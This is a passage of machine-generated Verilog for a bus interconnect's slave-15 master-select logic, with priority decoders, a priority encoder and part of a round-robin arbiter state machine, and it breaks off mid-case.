    always @ (  s15_msel_pri_enc_valid[3] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[3]) ) 
        begin
            s15_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) } == 2'h1 ) 
                begin
                    s15_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) } == 2'h2 ) 
                    begin
                        s15_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s15_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[3] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[3]) ) 
        begin
            s15_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s15_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[4] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[4]) ) 
        begin
            s15_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) } == 2'h1 ) 
                begin
                    s15_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) } == 2'h2 ) 
                    begin
                        s15_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s15_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[4] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[4]) ) 
        begin
            s15_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s15_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[5] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[5]) ) 
        begin
            s15_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) } == 2'h1 ) 
                begin
                    s15_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) } == 2'h2 ) 
                    begin
                        s15_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s15_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[5] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[5]) ) 
        begin
            s15_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s15_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[6] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[6]) ) 
        begin
            s15_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) } == 2'h1 ) 
                begin
                    s15_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) } == 2'h2 ) 
                    begin
                        s15_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s15_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[6] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[6]) ) 
        begin
            s15_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s15_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[7] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[7]) ) 
        begin
            s15_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) } == 2'h1 ) 
                begin
                    s15_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) } == 2'h2 ) 
                    begin
                        s15_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s15_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[7] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[7]) ) 
        begin
            s15_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s15_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s15_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s15_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd0_pri_out_d0 ) : ( s15_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s15_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd1_pri_out_d0 ) : ( s15_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd2_pri_out_d0 ) : ( s15_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd3_pri_out_d0 ) : ( s15_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd4_pri_out_d0 ) : ( s15_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd5_pri_out_d0 ) : ( s15_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd6_pri_out_d0 ) : ( s15_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd7_pri_out_d0 ) : ( s15_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s15_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd0_pri_out_d0 ) : ( s15_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s15_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd1_pri_out_d0 ) : ( s15_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd2_pri_out_d0 ) : ( s15_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd3_pri_out_d0 ) : ( s15_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd4_pri_out_d0 ) : ( s15_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd5_pri_out_d0 ) : ( s15_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd6_pri_out_d0 ) : ( s15_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd7_pri_out_d0 ) : ( s15_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s15_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s15_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s15_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s15_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s15_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s15_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s15_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s15_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd0_pri_out_d0 ) : ( s15_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s15_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd1_pri_out_d0 ) : ( s15_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd2_pri_out_d0 ) : ( s15_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd3_pri_out_d0 ) : ( s15_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd4_pri_out_d0 ) : ( s15_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd5_pri_out_d0 ) : ( s15_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd6_pri_out_d0 ) : ( s15_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s15_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s15_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s15_msel_pri_enc_pd7_pri_out_d0 ) : ( s15_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s15_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s15_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s15_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s15_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s15_next ) 
            begin
                s15_msel_pri_out <= ( ( ( s15_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s15_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s15_msel_pri_enc_pri_out0 ) : ( s15_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s15_msel_arb0_req = { ( s15_msel_req[7] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) } == 2'd0 ) ), ( s15_msel_req[6] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) } == 2'd0 ) ), ( s15_msel_req[5] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) } == 2'd0 ) ), ( s15_msel_req[4] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) } == 2'd0 ) ), ( s15_msel_req[3] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) } == 2'd0 ) ), ( s15_msel_req[2] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) } == 2'd0 ) ), ( s15_msel_req[1] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) } == 2'd0 ) ), ( s15_msel_req[0] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) } == 2'd0 ) ) };
    assign s15_msel_arb0_gnt = s15_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s15_msel_arb0_state <= s15_msel_arb0_grant0;
        end
        else
        begin 
            s15_msel_arb0_state <= s15_msel_arb0_next_state;
        end
    end
    always @ (  s15_msel_arb0_state or  { ( s15_msel_req[7] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) } == 2'd0 ) ), ( s15_msel_req[6] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) } == 2'd0 ) ), ( s15_msel_req[5] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) } == 2'd0 ) ), ( s15_msel_req[4] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) } == 2'd0 ) ), ( s15_msel_req[3] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) } == 2'd0 ) ), ( s15_msel_req[2] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) } == 2'd0 ) ), ( s15_msel_req[1] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) } == 2'd0 ) ), ( s15_msel_req[0] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s15_msel_arb0_next_state = s15_msel_arb0_state;
        case ( s15_msel_arb0_state ) 
        s15_msel_arb0_grant0:
        begin
            if (  !( s15_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s15_msel_arb0_req[1] ) 
                begin
                    s15_msel_arb0_next_state = s15_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s15_msel_arb0_req[2] ) 
                    begin
                        s15_msel_arb0_next_state = s15_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s15_msel_arb0_req[3] ) 
                        begin
                            s15_msel_arb0_next_state = s15_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s15_msel_arb0_req[4] ) 
                            begin
                                s15_msel_arb0_next_state = s15_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s15_msel_arb0_req[5] ) 
                                begin
                                    s15_msel_arb0_next_state = s15_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb0_req[6] ) 
                                    begin
                                        s15_msel_arb0_next_state = s15_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb0_req[7] ) 
                                        begin
                                            s15_msel_arb0_next_state = s15_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb0_grant1:
        begin
            if (  !( s15_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s15_msel_arb0_req[2] ) 
                begin
                    s15_msel_arb0_next_state = s15_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s15_msel_arb0_req[3] ) 
                    begin
                        s15_msel_arb0_next_state = s15_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s15_msel_arb0_req[4] ) 
                        begin
                            s15_msel_arb0_next_state = s15_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s15_msel_arb0_req[5] ) 
                            begin
                                s15_msel_arb0_next_state = s15_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s15_msel_arb0_req[6] ) 
                                begin
                                    s15_msel_arb0_next_state = s15_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb0_req[7] ) 
                                    begin
                                        s15_msel_arb0_next_state = s15_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb0_req[0] ) 
                                        begin
                                            s15_msel_arb0_next_state = s15_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb0_grant2:
        begin
            if (  !( s15_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s15_msel_arb0_req[3] ) 
                begin
                    s15_msel_arb0_next_state = s15_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s15_msel_arb0_req[4] ) 
                    begin
                        s15_msel_arb0_next_state = s15_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s15_msel_arb0_req[5] ) 
                        begin
                            s15_msel_arb0_next_state = s15_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s15_msel_arb0_req[6] ) 
                            begin
                                s15_msel_arb0_next_state = s15_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s15_msel_arb0_req[7] ) 
                                begin
                                    s15_msel_arb0_next_state = s15_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb0_req[0] ) 
                                    begin
                                        s15_msel_arb0_next_state = s15_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb0_req[1] ) 
                                        begin
